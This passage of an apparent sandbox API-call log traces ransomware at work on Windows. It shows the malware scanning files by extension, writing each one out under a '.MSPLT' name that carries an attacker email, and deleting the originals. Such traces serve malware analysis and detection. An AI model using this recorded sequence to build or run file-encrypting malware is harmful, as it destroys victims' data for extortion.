(lpString1=".rar", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString=".bz2") returned 4 [0287.880] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString=".7z") returned 3 [0287.880] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString=".dbf") returned 4 [0287.880] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString=".1cd") returned 4 [0287.880] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString=".jpg") returned 4 [0287.880] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString=".doc") returned 4 [0287.880] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString=".docx") returned 5 [0287.880] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.880] lstrlenW (lpString=".pdf") returned 4 [0287.880] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString=".xls") returned 4 [0287.880] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString=".xlsx") returned 5 [0287.880] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.880] lstrlenW (lpString=".ppt") returned 4 [0287.880] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.880] lstrlenW (lpString=".zip") returned 4 [0287.881] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.881] lstrlenW (lpString=".rar") returned 4 [0287.881] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.881] lstrlenW (lpString=".bz2") returned 4 [0287.881] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.881] lstrlenW (lpString=".7z") returned 3 [0287.881] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.881] lstrlenW (lpString=".dbf") returned 4 [0287.881] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.881] lstrlenW (lpString=".1cd") returned 4 [0287.881] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.881] lstrlenW (lpString=".jpg") returned 4 [0287.881] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.881] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.881] lstrlenW (lpString="auxbase.xml") returned 11 [0287.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.918] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=1434) returned 1 [0287.918] CloseHandle (hObject=0x420) returned 1 [0287.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0288.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.212] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0288.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.212] lstrlenW (lpString=".doc") returned 4 [0288.212] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0288.212] lstrlenW (lpString=".docx") returned 5 [0288.212] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0288.212] lstrlenW (lpString=".pdf") returned 4 [0288.212] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0288.212] lstrlenW (lpString=".xls") returned 4 [0288.212] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0288.212] lstrlenW (lpString=".xlsx") returned 5 [0288.213] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0288.213] lstrlenW (lpString=".ppt") returned 4 [0288.213] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString=".zip") returned 4 [0288.213] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0288.213] lstrlenW (lpString=".rar") returned 4 [0288.213] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString=".bz2") returned 4 [0288.213] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString=".7z") returned 3 [0288.213] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString=".dbf") returned 4 [0288.213] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString=".1cd") returned 4 [0288.213] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString=".jpg") returned 4 [0288.213] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.213] lstrlenW (lpString=".doc") returned 4 [0288.213] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0288.213] lstrlenW (lpString=".docx") returned 5 [0288.214] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0288.214] lstrlenW (lpString=".pdf") returned 4 [0288.214] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString=".xls") returned 4 [0288.214] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString=".xlsx") returned 5 [0288.214] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0288.214] lstrlenW (lpString=".ppt") returned 4 [0288.214] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.214] lstrlenW (lpString=".zip") returned 4 [0288.214] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0288.214] lstrlenW (lpString=".rar") returned 4 [0288.214] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString=".bz2") returned 4 [0288.214] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString=".7z") returned 3 [0288.214] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0288.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.214] lstrlenW (lpString=".dbf") returned 4 [0288.214] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.214] lstrlenW (lpString=".1cd") returned 4 [0288.214] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0288.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0288.214] lstrlenW (lpString=".jpg") returned 4 [0288.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0288.215] Sleep (dwMilliseconds=0x64) [0288.490] Sleep (dwMilliseconds=0x64) [0288.975] Sleep (dwMilliseconds=0x64) [0289.613] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0289.613] lstrlenW (lpString="AN00010_.WMF") returned 12 [0289.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0290.087] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=3026) returned 1 [0290.087] CloseHandle (hObject=0x460) returned 1 [0290.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 0x220 [0290.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0290.091] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.091] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0290.092] GetLastError () returned 0x0 [0290.092] ReadFile (in: hFile=0x460, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xbd2, lpOverlapped=0x0) returned 1 [0290.112] WriteFile (in: hFile=0x44c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xbe0, lpOverlapped=0x0) returned 1 [0290.114] ReadFile (in: hFile=0x460, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.114] WriteFile (in: hFile=0x44c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0290.114] SetEndOfFile (hFile=0x44c) returned 1 [0290.115] CloseHandle (hObject=0x44c) returned 1 [0290.116] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.116] SetEndOfFile (hFile=0x460) returned 1 [0290.120] CloseHandle (hObject=0x460) returned 1 [0290.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0290.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.124] lstrlenW (lpString=".doc") returned 4 [0290.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.124] lstrlenW (lpString=".docx") returned 5 [0290.124] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.124] lstrlenW (lpString=".pdf") returned 4 [0290.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.124] lstrlenW (lpString=".xls") returned 4 [0290.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.124] lstrlenW (lpString=".xlsx") returned 5 [0290.124] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.124] lstrlenW (lpString=".ppt") returned 4 [0290.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.124] lstrlenW (lpString=".zip") returned 4 [0290.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.124] lstrlenW (lpString=".rar") returned 4 [0290.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString=".bz2") returned 4 [0290.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString=".7z") returned 3 [0290.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.125] lstrlenW (lpString=".dbf") returned 4 [0290.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.125] lstrlenW (lpString=".1cd") returned 4 [0290.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.125] lstrlenW (lpString=".jpg") returned 4 [0290.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.125] lstrlenW (lpString=".doc") returned 4 [0290.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString=".docx") returned 5 [0290.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.125] lstrlenW (lpString=".pdf") returned 4 [0290.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.125] lstrlenW (lpString=".xls") returned 4 [0290.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.125] lstrlenW (lpString=".xlsx") returned 5 [0290.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.125] lstrlenW (lpString=".ppt") returned 4 [0290.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.126] lstrlenW (lpString=".zip") returned 4 [0290.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.126] lstrlenW (lpString=".rar") returned 4 [0290.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.126] lstrlenW (lpString=".bz2") returned 4 [0290.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.126] lstrlenW (lpString=".7z") returned 3 [0290.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.126] lstrlenW (lpString=".dbf") returned 4 [0290.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.126] lstrlenW (lpString=".1cd") returned 4 [0290.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0290.126] lstrlenW (lpString=".jpg") returned 4 [0290.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.127] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0290.127] lstrlenW (lpString="AN00790_.WMF") returned 12 [0290.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.368] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=5684) returned 1 [0290.368] CloseHandle (hObject=0x454) returned 1 [0290.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 0x220 [0290.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.909] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.910] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0292.321] GetLastError () returned 0x0 [0292.333] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1634, lpOverlapped=0x0) returned 1 [0292.336] WriteFile (in: hFile=0x450, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1640, lpOverlapped=0x0) returned 1 [0292.338] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.338] WriteFile (in: hFile=0x450, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.338] SetEndOfFile (hFile=0x450) returned 1 [0292.339] CloseHandle (hObject=0x450) returned 1 [0292.340] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.340] SetEndOfFile (hFile=0x440) returned 1 [0292.345] CloseHandle (hObject=0x440) returned 1 [0292.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.345] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0292.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.347] lstrlenW (lpString=".doc") returned 4 [0292.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.347] lstrlenW (lpString=".docx") returned 5 [0292.347] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.347] lstrlenW (lpString=".pdf") returned 4 [0292.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.347] lstrlenW (lpString=".xls") returned 4 [0292.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.347] lstrlenW (lpString=".xlsx") returned 5 [0292.347] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.347] lstrlenW (lpString=".ppt") returned 4 [0292.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString=".zip") returned 4 [0292.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.348] lstrlenW (lpString=".rar") returned 4 [0292.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString=".bz2") returned 4 [0292.348] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString=".7z") returned 3 [0292.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString=".dbf") returned 4 [0292.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString=".1cd") returned 4 [0292.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString=".jpg") returned 4 [0292.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.348] lstrlenW (lpString=".doc") returned 4 [0292.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.348] lstrlenW (lpString=".docx") returned 5 [0292.348] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.349] lstrlenW (lpString=".pdf") returned 4 [0292.349] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.349] lstrlenW (lpString=".xls") returned 4 [0292.349] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.349] lstrlenW (lpString=".xlsx") returned 5 [0292.349] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.349] lstrlenW (lpString=".ppt") returned 4 [0292.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.349] lstrlenW (lpString=".zip") returned 4 [0292.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.349] lstrlenW (lpString=".rar") returned 4 [0292.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.349] lstrlenW (lpString=".bz2") returned 4 [0292.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.350] lstrlenW (lpString=".7z") returned 3 [0292.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.350] lstrlenW (lpString=".dbf") returned 4 [0292.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.350] lstrlenW (lpString=".1cd") returned 4 [0292.350] lstrcmpiW 